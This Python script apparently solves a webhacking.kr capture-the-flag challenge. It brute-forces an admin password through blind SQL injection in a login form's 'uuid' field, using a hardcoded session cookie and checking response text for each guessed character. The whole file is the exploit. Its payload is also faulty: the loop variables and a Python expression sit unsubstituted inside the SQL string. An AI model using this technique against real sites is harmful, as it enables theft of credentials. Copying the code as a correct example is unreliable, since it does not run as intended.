import requests
import string

url = "http://webhacking.kr/challenge/bonus/bonus-2/index.php"
cookies = {'PHPSESSID' : '87a2ba04b9ed52b3f1b129e1a340df39'}
chr_list = string.ascii_lowercase+'1234567890'

result=''
length=32

for i in range (1,length+1) :
    for j in chr_list :
        params = {"uuid" : "admin' and if(substr(pw,i,1) in str(hex(ord(j))),1,0)#","pw":""}
        req = requests.post(url,data=params,cookies=cookies)

        if((req.text).find("Wrong passsword!")>0):
            result += j
            break

print(result)
